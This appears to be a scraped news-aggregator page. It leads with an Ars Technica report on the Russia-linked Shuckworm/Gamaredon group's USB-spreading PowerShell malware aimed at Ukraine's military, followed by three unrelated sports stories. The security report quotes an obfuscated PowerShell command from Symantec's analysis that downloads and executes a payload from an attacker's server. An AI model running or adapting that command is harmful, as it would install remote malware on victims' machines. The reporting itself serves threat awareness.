Connect with us

Published

on

LASER-FOCUSED — Russia-backed hackers unleash new USB-based malware on Ukraines military Shuckworm’s relentless attacks seek intel for use in Russia’s invasion of Ukraine.

Dan Goodin – Jun 15, 2023 10:30 am UTC EnlargeGetty Images reader comments 9 with

Hackers working for Russias Federal Security Service have mounted multiple cyberattacks that used USB-based malware to steal large amounts of data from Ukrainian targets for use in its ongoing invasion of its smaller neighbor, researchers said.

The sectors and nature of the organizations and machines targeted may have given the attackers access to significant amounts of sensitive information, researchers from Symantec, now owned by Broadcom, wrote in a Thursday post. There were indications in some organizations that the attackers were on the machines of the organizations human resources departments, indicating that information about individuals working at the various organizations was a priority for the attackers, among other things.

The group, which Symantec tracks as Shuckworm and other researchers call Gamaredon and Armageddon, has been active since 2014 and has been linked to Russias FSB, the principal security service in that country. The group focuses solely on obtaining intelligence on Ukrainian targets. In 2020, researchers at security firm SentinelOne said the hacking group had attacked over 5,000 individual entities across the Ukraine, with particular focus on areas where Ukrainian troops are deployed.

In February, Shuckworm began deploying new malware and command-and-control infrastructure that has successfully penetrated the defenses of multiple Ukrainian organizations in the military, security services, and government of that country. Group members seem most interested in obtaining information related to sensitive military information that could be abused in Russias ongoing invasion.

This newer campaign debuted new malware in the form of a PowerShell script that spreads Pterodo, a Shuckworm-created backdoor. The script activates when infected USB drives are connected to targeted computers. The malicious script first copies itself onto the targeted machine to create a shortcut file with the extension rtf.lnk. The files have names such as video_porn.rtf.lnk, do_not_delete.rtf.lnk, and evidence.rtf.lnk. The names, which are mostly in the Ukrainian language, are an attempt to entice targets to open the files so they will install Pterodo on machines. Advertisement

The script goes on to enumerate all drives connected to the targeted computer and to copy itself to all attached removable drives, most likely in hopes of infecting any air-gapped devices, which are intentionally not connected to the Internet in an attempt to prevent them from being hacked.

To cover its tracks, Shuckworm has created dozens of variants and rapidly rotated the IP addresses and infrastructure it uses for command and control. The group also uses legitimate services such as Telegram and its micro-blogging platform Telegraph for command and control in another attempt to avoid detection.

Shuckworm typically uses phishing emails as an initial vector into targets computers. The emails contain malicious attachments that masquerade as files with extensions, including .docx, .rar, .sfx, lnk, and hta. Emails often use topics such as armed conflicts, criminal proceedings, combating crime, and protecting children as lures to get targets to open the emails and click on the attachments.

Symantec researchers said that an infected computer they recovered in the campaign was typical for the way it works. They wrote: In one victim, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious Document.

After the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers C&C server:

“CSIDL_SYSTEMcmd.exe” /c start /min “” powershell -w hidden
“$gt=’/get.’+[char](56+56)+[char](104)+[char](112);$hosta=[char](50+4
8);[system.net.servicepointmanager]::servercertificatevalidationcallb
ack={$true};$hosta+=’.vafikgo.’;$hosta+=[char](57+57);$hosta+=[char](
60+57);$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.ad
dresslist[0];$client=(new-object
net.webclient);$faddr=’htt’+’ps://’+$addr+$gt;$text=$client.downloads
tring($faddr);iex $text”

More recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.

Shuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the groups scripts observed per month between January and April 2023.

Thursdays post includes IP addresses, hashes, file names, and other indicators of compromise people can use to detect if they have been targeted. The post also warns that the group poses a threat that targets should take seriously.

This activity demonstrates that Shuckworms relentless focus on Ukraine continues, they wrote. It seems clear that Russian nation-state-backed attack groups continue to laser in on Ukrainian targets in attempts to find data that may potentially help their military operations. reader comments 9 with Dan Goodin Dan Goodin is Senior Security Editor at Ars Technica, where he oversees coverage of malware, computer espionage, botnets, hardware hacking, encryption, and passwords. In his spare time, he enjoys gardening, cooking, and following the independent music scene. Advertisement Channel Ars Technica ← Previous story Next story → Related Stories Today on Ars

Continue Reading

Sports

Ohtani’s walk-off pushes Dodgers to historic 8-0

Published

on

By

Ohtani's walk-off pushes Dodgers to historic 8-0

LOS ANGELES — Aside from his ability to pitch and hit and stretch the boundaries of imagination, Shohei Ohtani has displayed another singular trait in his time in the major leagues: an ability to meet the moment. Or, perhaps, for the moment to meet him.

And so on Wednesday night, with his Los Angeles Dodgers looking to stay unbeaten, the score tied in the bottom of the ninth, and more than 50,000 fans standing and clenching the Ohtani bobbleheads they lined up hours in advance for, Ohtani approached the batter’s box — and his teammates expected greatness.

“He’s going to end this right here,” Dodgers third baseman Max Muncy said he thought to himself.

“We knew,” starting pitcher Blake Snell said. “It’s just what he does.”

Validation came instantly. Ohtani stayed back on a first-pitch changeup from Raisel Iglesias near the outside corner and shot it toward straightaway center field, 399 feet away, for a walk-off home run, sending the Dodgers to a 6-5, come-from-behind victory over the reeling Atlanta Braves.

“I don’t think anybody didn’t expect him to hit a walk-off home run there,” Dodgers utility man Tommy Edman said. “It’s just a question of where he’d hit it.”

The Dodgers are now 8-0, topping the 1933 New York Yankees of Lou Gehrig and Babe Ruth for the longest winning streak to begin a season for a reigning champion. The Braves, meanwhile, are 0-7, the type of record no team has ever recovered from to make the playoffs. And Ohtani, with three home runs and a 1.126 OPS this season, just keeps meeting moments.

“He’s pretty good, huh?” Dodgers outfielder Teoscar Hernandez said. “It’s Shohei. He’s going to do that. He’s going to do things better than that.”

On Aug. 23 last year, Ohtani reached the 40/40 club with a walk-off grand slam. Five days later, the Dodgers staged a second giveaway of his bobblehead — one that saw his now-famous dog, Decoy, handle the ceremonial first pitch — and Ohtani led off with a home run. On Sept. 19, Ohtani clinched his first postseason berth and ascended into the unprecedented 50/50 club with one of the greatest single-game performances in baseball history — six hits, three homers, two steals and 10 RBIs. Barely two weeks later, he homered in his first playoff game.

When Ohtani came up on Wednesday, he had what he described as a simple approach.

“I was looking for a really good pitch to hit,” Ohtani said through an interpreter. “If I didn’t get a good pitch to hit, I was willing to walk.”

Of course, though, he got a good pitch.

And, of course, he sent it out.

“You just feel that he’s going to do something special,” Dodgers manager Dave Roberts said. “And I just like the way he’s not pressing. He’s in the strike zone, and when he does that, there’s just no one better.”

The Dodgers began their much-anticipated season with a couple of breezy wins over the Chicago Cubs from Japan, even though Mookie Betts and Freddie Freeman did not play in them. They returned home, brought iconic rapper Ice Cube out to present the World Series trophy on one afternoon, received their rings on another and swept a three-game series against the Detroit Tigers. Then came the Braves, and the Dodgers swept them, too — even though Freeman, nursing an ankle injury caused from slipping in the shower, didn’t participate.

The Dodgers already have two walk-offs and six comeback wins this season.

Wednesday’s effort left Roberts “a little dumbfounded.”

A nightmarish start defensively, highlighted by two errant throws from Muncy, spoiled Snell’s start and put them behind 5-0 after the first inning and a half. But the Dodgers kept inching closer. They trailed by just two in the eighth and put runners on second and third with two out. Muncy came to bat with his batting average at just .083. He had used the ballyhooed “Torpedo” bat for his first three plate appearances, didn’t like how it altered his swing plane, grabbed his usual bat for a showdown against Iglesias and laced a game-tying double into the right-center-field gap.

An inning later, Ohtani ended it.

“Overall, not just tonight, there is a really good vibe within the team,” Ohtani said after recording his fourth career walk-off hit. “I just think that’s allowing us to come back in these games to win.”

The Dodgers’ 8-0 start has allowed them to stay just ahead of the 7-0 San Diego Padres and the 5-1 San Francisco Giants in the National League West. Tack on the Arizona Diamondbacks (4-2) and the Colorado Rockies (1-4), and this marks the first time in the divisional era that an entire division has combined for at least 25 wins and no more than seven losses, according to ESPN Research. The Dodgers’ and Padres’ starts mark just the fifth season in major league history with multiple teams starting 7-0 or better, and the first time since 2003.

The Dodgers famously overcame a 2-1 series deficit to vanquish the Padres in the NL Division Series last year, then rode that fight to their first full-season championship since 1988.

That fight hasn’t let up.

“It feels like this clubhouse is carrying a little bit of the attitude we had last year that we’re never out of a game and we’re resilient, and we’ve been carrying it into this season,” Muncy said. “It’s been fun to watch. The guys don’t give up. Bad things have happened, and no one’s really been down or out on themselves. Everyone’s just, ‘All right, here we go, next inning, let’s get after it.’ The whole team, top to bottom, has been doing that. It’s been making it really, really fun to play.”

Continue Reading

Sports

‘Reason he’s here’: Crochet delivers for Red Sox

Published

on

By

'Reason he's here': Crochet delivers for Red Sox

BALTIMORE — Garrett Crochet gave the Boston Red Sox an immediate return on their investment.

In his first start since agreeing to a $170 million, six-year contract, the left-hander pitched a career-best eight innings as the Red Sox shut out the Baltimore Orioles 3-0 on Wednesday night. Crochet also threw 102 pitches, one shy of his career high.

“My first start in college I went eight, and I haven’t sniffed it since,” Crochet said.

Crochet (1-0) gave up four hits and a walk while striking out eight in his first victory since the offseason trade that sent him from the Chicago White Sox to Boston.

“That’s the reason he’s here,” manager Alex Cora said after the game. “That’s the reason we committed to him.”

Crochet went 6-12 with a 3.58 ERA last season, a bright spot on a Chicago team that lost 121 games. He threw 146 innings, which was double his previous career total since his debut in 2020.

Then Crochet was dealt to the Red Sox, and they made their long-term commitment to the 25-year-old earlier this week.

“Going back to when the trade went through, we knew Boston was a place where we would love to be long term,” Crochet said. “Credit to the front office for staying diligent, and my agency as well.”

Now the question is less about where he’ll pitch and more about how well. He’s off to a nice start in that regard.

“I can’t think of the last time I played baseball for pride. In college, you’re playing to get drafted, and once you’re in the big leagues, you’re playing to stay in the big leagues,” Crochet said. “So to have this security and feel like I’m playing to truly just win ballgames, it takes a lot of the riff-raff out of it.”

The news all around was good for Boston on Wednesday.

It reached a $60 million, eight-year deal with young infielder Kristian Campbell, and he went out and doubled twice against the Orioles.

And Rafael Devers ended a 21-at-bat hitless streak to start the season with an RBI double in the fifth inning. He finished with two hits and no strikeouts.

Information from The Associated Press was used in this report.

Continue Reading

Sports

Death of Gardner’s son pinned to carbon monoxide

Published

on

By

Death of Gardner's son pinned to carbon monoxide

SAN JOSE, Costa Rica — Carbon monoxide poisoning was the cause of death of the teenage son of former New York Yankees outfielder Brett Gardner, authorities in Costa Rica said Wednesday night.

Randall Zúñiga, director of the Judicial Investigation Agency, said 14-year-old Miller Gardner was tested for carboxyhemoglobin, a compound generated when carbon monoxide binds to hemoglobin in the blood.

When carboxyhemoglobin saturation exceeds 50%, it is considered lethal. In Gardner’s case, the test showed a saturation of 64%.

“It’s important to note that adjacent to this room is a dedicated machine room, where it’s believed there may be some type of contamination toward these rooms,” Zúñiga said.

The head of the Costa Rican judicial police added that, during the autopsy, a “layer” was detected on the boy’s organs, which forms when there is a high presence of the poisonous gas.

Gardner died March 21 while staying with his family at a hotel on the Manuel Antonio beach in Costa Rica’s Central Pacific.

Asphyxiation was initially thought to have caused his death. After an autopsy was performed by the Forensic Pathology Section, that theory was ruled out.

Another line of investigation centered around whether the family had suffered food poisoning. Family members had reported feeling ill after dining at a nearby restaurant on the night of March 20 and received treatment from the hotel doctor.

Brett Gardner, 41, was drafted by the Yankees in 2005 and spent his entire major league career with the organization. The speedy outfielder batted .256 with 139 homers, 578 RBIs, 274 steals and 73 triples in 14 seasons from 2008 to 2021.

Continue Reading

Trending